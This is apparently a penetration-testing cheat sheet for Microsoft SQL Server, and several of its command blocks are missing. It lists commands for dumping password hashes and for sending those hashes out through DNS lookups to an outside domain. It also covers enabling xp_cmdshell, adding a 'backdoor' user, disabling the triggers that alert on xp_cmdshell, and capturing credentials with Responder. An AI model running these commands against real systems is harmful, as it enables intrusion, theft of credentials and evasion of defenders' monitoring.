1433 - Microsoft SQL
Microsoft SQL Server is a relational database management system developed by Microsoft.
Normal Port - 1433
Hidden mode port - 2433
Connect
Connect using one of the following options:
sqsh
sqsh -S someserver -U sa -P password
metasploit
metasploit (mssql_login)
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
mssqclient
Impacket script mssqclient
mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
sqlcmd
sqlcmd. To use SQL Server Authentication, you must specify a user name and password by using the -U and -P options.
sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
crackmapexec
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
MSSQL 2003 commands
taken from: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Task
Command
Version
SELECT @@version
Comments
SELECT 1 -- comment
SELECT /*comment*/1
Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users
SELECT name FROM master..syslogins
List Password Hashes
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
Password Cracker
List Privileges
Impossible?
List DBA Accounts
TODO
SELECT is_srvrolemember('sysadmin'); --priv
Current Database
SELECT DB_NAME()
List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
List Tables
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
Find Tables From Column Name
-- NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth Char
SELECT substring('abcd', 3, 1) -- returns c
Bitwise AND
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0
ASCII Value -> Char
SELECT char(0x41) -- returns A
Char -> ASCII Value
SELECT ascii('A') - returns 65
Casting
SELECT CAST('1' as int);
SELECT CAST(1 as char)
String Concatenation
SELECT 'A' + 'B' - returns AB
If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding Quotes
SELECT char(65)+char(66) -- returns AB
Time Delay
WAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requests
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
Command Execution
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv
Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;
Hostname, IP Address
SELECT HOST_NAME()
Create Users
Drop Users
Make User DBA
Location of DB files
TODO
Default/System Databases
northwind
model
msdb
pubs
tempdb
MSSQL 2017 Commands
Current user’s permissions:
Check out the databases available:
I can look for user generated tables on those databases:
Enumeration
Nmap
Scan:
nmap -sU --script=ms-sql-info 192.168.1.108
Dump hashes:
nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
Execute command:
nmap -Pn -n -sS –script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 –script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd=”net user backdoor backdoor123 /add”
Metasploit
Find MSSQL servers:
msf > use auxiliary/scanner/mssql/mssql_ping
mssql_enum
The mssql_enum is an admin module that will accept a set of credentials and query a MSSQL for various configuration settings.
mssql_exec
The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.
PowerUpSQL
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
Link: https://github.com/NetSPI/PowerUpSQL
Example:
Or load into memory
SQL Server Discovery Cheats
Description
Command
Discover Local SQL Server Instances
Get-SQLInstanceLocal -Verbose
Discover Remote SQL Server Instances
UDP Broadcast Ping
Get-SQLInstanceBroadcast -Verbose
UDP Port Scan
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
Get the instance list from a file
Get-SQLInstanceFile -FilePath c:\temp\computers.txt | Get-SQLInstanceScanUDPThreaded -Verbose
Discover Active Directory Domain SQL Server Instances
Get-SQLInstanceDomain -Verbose
Discover Active Directory Domain SQL Server Instances using alternative domain credentials
runas /noprofile /netonly /user:domain\user PowerShell.exe
import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController 192.168.1.1 -Username domain\user -password P@ssword123
List SQL Servers using a specific domain account
Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc
List shared domain user SQL Server service accounts
Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }
More commands can be found in the github repo or in the tool section.
Linked Servers
Microsoft SQL Server allows links to be created to external data sources such as other SQL servers, Oracle databases, excel spreadsheets, and so on. Due to common misconfigurations the links, or “Linked Servers”, can often be exploited to traverse database link networks, gain unauthorized access to data, and deploy shells.
Source: https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Find linked servers:
Execute commands on the other server:
Bruteforce login
Metasploit
Bruteforce MSSQL Login
msf > use auxiliary/admin/mssql/mssql_login
Metasploit MSSQL Shell
Nmap
Enable xp_cmdshell
Check if enabled
xp_cmdshell whoami
Or
EXEC xp_cmdshell 'net user'; -- priv
Or
EXEC master.dbo.xp_cmdshell 'cmd';
Enable xp_cmdshell
Short way:
Long way:
Check if it works
xp_cmdshell 'dir C:\'
Disable Trigger
If you get a error when we try to enable xp_cmdshell on trigger, such as:
These triggers are a policy put in place to alert and block attempts to enable and use xp_cmdshell. The problem is, as sa, we can disable these triggers.
SQL> disable trigger ALERT_xp_cmdshell on all server
And then enable xp_cmdshell
Capture credentials using xp_dirtree
Capture credentials using responder and xp_dirtree:
Start Responder:
root@kali# responder -I eth0
Issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on our host:
It doesn’t return anything, but in the responder window, I’ve captured the necessary information:
Execue_external_script
We can use sp_execute_external_scrip
to execute external command,
SQL Server 2017 now supports Python as an extensible script engine and we can use it to execute commands:
Last updated